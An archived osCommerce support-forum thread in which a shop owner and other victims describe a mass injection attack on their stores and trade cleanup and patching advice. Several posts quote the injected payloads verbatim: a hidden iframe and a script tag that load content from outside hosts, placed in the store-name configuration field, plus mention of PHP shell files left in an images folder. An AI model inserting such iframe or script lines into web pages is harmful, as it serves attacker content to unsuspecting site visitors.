Jump to content
dev osCommerce
Forum
  • Checkout
  • Login
  • Contact Us
  • Get in touch

osCommerce

The e-commerce.

New Demo
Our Partners

Help Please! SOS!

stevenchim

By stevenchim
in Security

Recommended Posts

stevenchim

stevenchim

Posted
Posted

Starting from last Saturday there is some additional code disappear on my site..

 

For example, when I receive a e-mail from customer enquiry box.

The title is shown as XXXXXXXX<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>XXX

the script between is added by unknown people.

 

Did anyone have this problem too?

And how can I remove it?

Link to comment
Share on other sites
Jack_mcs

Jack_mcs

Posted
Posted

You have to find the files where the code was edited and re-edit them. Sometimes there is only one file and sometimes there are hundreds of them. There may also be files added toallow the hacker to continue editing your code. You need to remove all of those files. Once that is done, or before, you need to apply the security changes as mentioned many times a day on these forums. Otherwise the hacker will just come back.

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

All of My Addons

Get the latest versions of my addons

Recommended SEO Addons

Link to comment
Share on other sites
stevenchim

stevenchim

Posted
  • Author
Posted

Any idea where to start looking at?

 

The first step I do is just searching the key word but no result.

 

Any idea where I should starting look at?

 

The recent change is I change permission of image folder to 777

Link to comment
Share on other sites
Jack_mcs

Jack_mcs

Posted
Posted

It varies with the hacker. Search for just iframe and that may show something. But keep in mind that legitimate code might use iframe too so you can't just delete any you find. Also look in your images directory for non-image files. There usually shouldn't be any except for a .htaccess file.

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

All of My Addons

Get the latest versions of my addons

Recommended SEO Addons

Link to comment
Share on other sites
stevenchim

stevenchim

Posted
  • Author
Posted

It varies with the hacker. Search for just iframe and that may show something. But keep in mind that legitimate code might use iframe too so you can't just delete any you find. Also look in your images directory for non-image files. There usually shouldn't be any except for a .htaccess file.

 

I found ..may be twenty .php file in the image folder, which should not exist in this folder.

I deleted them all and still looking for un-usual file.

Thanks.

Link to comment
Share on other sites
Biancoblu

♥Biancoblu

Posted
Posted

If you still have the problem it means you haven't removed all of the hacker's code.

If I were you I'd delete the entire site and restore it all from a good backup, provided you have a good backup? If not, I suggest you get a professional to look at your files and cleanse them properly. Like Jack said, you will then have to apply security measures.

~ Don't mistake my kindness for weakness ~

Link to comment
Share on other sites
the_katsu

the_katsu

Posted
Posted

My site got hacked as this way too.

You need to erase injected codes on your database.

http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html

In my case I had to remove <iframe> tags from zen_configuration and <script> from zen_categories_description. I'm using Zen-cart 1.2.x.

 

The site works now but I wonder how it's possible to make sure this won't be happen again. Any patch released?

Link to comment
Share on other sites
stevenchim

stevenchim

Posted
  • Author
Posted

My site got hacked as this way too.

You need to erase injected codes on your database.

http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html

In my case I had to remove <iframe> tags from zen_configuration and <script> from zen_categories_description. I'm using Zen-cart 1.2.x.

 

The site works now but I wonder how it's possible to make sure this won't be happen again. Any patch released?

 

Thanks for your imformation.

I have looked into the database, but it seems fine for me.

I cant find any <iframe> tags in the database :(

Link to comment
Share on other sites
lmalonsof

lmalonsof

Posted
Posted

Hi there,

 

we have the same problem. We've been infected with this:

 

<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

 

It was in the 'configuration_value' field from the 'configuration' table, in the first record just where 'Store_name' is. We've been able to clean the database and now it is fine but we don't know what to do. We assume this an oscommerce bug but, which version is safe? Do we have to upgrade from 2.2RC2 to 2.3.1? Is this bug in the new ones too?

 

thanks

Link to comment
Share on other sites
Biancoblu

♥Biancoblu

Posted
Posted

If you are using version 2.2, make sure you apply ALL the security measures described here: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/

 

Version 2.3.1 has fixed a lot of security bugs, upgrading from 2.2 to 2.3.1 requires some work on the database because the structure is different, and many addons written for 2.2 will have to be slightly worked on to work on 2.3.1.

~ Don't mistake my kindness for weakness ~

Link to comment
Share on other sites
lmalonsof

lmalonsof

Posted
Posted

If you are using version 2.2, make sure you apply ALL the security measures described here: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/

 

Version 2.3.1 has fixed a lot of security bugs, upgrading from 2.2 to 2.3.1 requires some work on the database because the structure is different, and many addons written for 2.2 will have to be slightly worked on to work on 2.3.1.

 

Ok, working on it. We'll report further problems.

Link to comment
Share on other sites
Guest

Guest

Posted
Posted

Our site got hacked as well.

It was injected in the DB (config values).

Only removing it from the database wont help long, you have to update the security.

We followed the steps on the above mentioned secure oscommerce thread and installed osc_sec package r8. Since then, no more successfull attacks (although we get attacks every 5 hours or so with all kinds of attempts to get in...) - none gets through anymore ;)

 

Oh, we have 2.2, so dont think u have to update the whole system, i wouldnt take that pain...

 

Feel free to contact u for help.

Link to comment
Share on other sites
stevenchim

stevenchim

Posted
  • Author
Posted

Our site got hacked as well.

It was injected in the DB (config values).

Only removing it from the database wont help long, you have to update the security.

We followed the steps on the above mentioned secure oscommerce thread and installed osc_sec package r8. Since then, no more successfull attacks (although we get attacks every 5 hours or so with all kinds of attempts to get in...) - none gets through anymore ;)

 

Oh, we have 2.2, so dont think u have to update the whole system, i wouldnt take that pain...

 

Feel free to contact u for help.

 

So which table(s) of DB is affected?

Link to comment
Share on other sites
Taipo

Taipo

Posted
Posted

Steven

 

Basically if your site is not patched against the known exploit hole in the admin area that was reported last year then removing all the hack code will be no different than trying to push the tide out with your hands.

 

You need to also patch your sites security as is listed in most of the discussions in this part of the forums.

 

That is assuming you are at least using a recent version of osCommerce.

 

Versions up to 2.2rc1 need patching urgently, and in cases where 2.2rc1 has been completely trashed by hacks, its best then to just upgrade to 2.3.1. Pound for pound its no different in terms of time and energy to fixed a heavily hacked up website as it is to transfer to the latest version of osCommerce.

 

I have observed many users spend weeks trying to track and trace through all of their files to repair the damage that 'some' hacks can reek on a website, match that to the week it would take you to rebuild your site on 2.3.1 and import your products.

 

Earlier versions than 2.2 just need to be ditched and you need to start again with 2.3.1

 

Most of those files you found in your images directory will probably be shell code - or in plain terms, file managers that give hackers almost the same amount of access to your site as the file manager in the admin directory does.

 

If you intend to continue using 2.2rc1 after cleaning up, then I recommend that you follow the suggestions here - at the very least options 2,5 & 6 - the rest being optional extras that can help improve security as well.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites
stevenchim

stevenchim

Posted
  • Author
Posted

Steven

 

Basically if your site is not patched against the known exploit hole in the admin area that was reported last year then removing all the hack code will be no different than trying to push the tide out with your hands.

 

You need to also patch your sites security as is listed in most of the discussions in this part of the forums.

 

That is assuming you are at least using a recent version of osCommerce.

 

Versions up to 2.2rc1 need patching urgently, and in cases where 2.2rc1 has been completely trashed by hacks, its best then to just upgrade to 2.3.1. Pound for pound its no different in terms of time and energy to fixed a heavily hacked up website as it is to transfer to the latest version of osCommerce.

 

I have observed many users spend weeks trying to track and trace through all of their files to repair the damage that 'some' hacks can reek on a website, match that to the week it would take you to rebuild your site on 2.3.1 and import your products.

 

Earlier versions than 2.2 just need to be ditched and you need to start again with 2.3.1

 

Most of those files you found in your images directory will probably be shell code - or in plain terms, file managers that give hackers almost the same amount of access to your site as the file manager in the admin directory does.

 

If you intend to continue using 2.2rc1 after cleaning up, then I recommend that you follow the suggestions here - at the very least options 2,5 & 6 - the rest being optional extras that can help improve security as well.

 

Thank you very much for the advice. I will try to see what I can do.

 

As we all know the shop name is changed like every 5 hours.

Yesterday I have deleted the file manager php file from admin.

And now it seems fine.

Link to comment
Share on other sites
Query11

Query11

Posted
Posted

Query11: Very good scripts, thanks for sharing. They are now using "1see.ir/j/" in the injection... So a new one to add there.

Thank you for your useful information.

Looks like "1see.ir/j/" is improved version of "exero".

It infects not only configuration. "1see.ir/j/" is able to be injected to each text field of the database.

Here it is the free script for removal "1see.ir/j/":

http://www.greatis.com/security/1see-ir-infection-removal.htm

Link to comment
Share on other sites
stevenchim

stevenchim

Posted
  • Author
Posted

after I did all the actions mentioned above..

the site is ok for the last few days..

but today comes to something new

 

(shop name)</title><script src=http://tiasissi.com.br/revendedores/jquery/></script><title>

 

sign...

Link to comment
Share on other sites
Guest

Guest

Posted
Posted

Steven,

 

Your site is vulnerable to hacker attacks and needs to be cleaned and secured to prevent injection attacks like that.

 

 

 

 

 

Chris

Link to comment
Share on other sites
Taipo

Taipo

Posted
Posted

Steven did you give osC_Sec a try in the end?

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

Go to topic listing
×
×
  • Create New...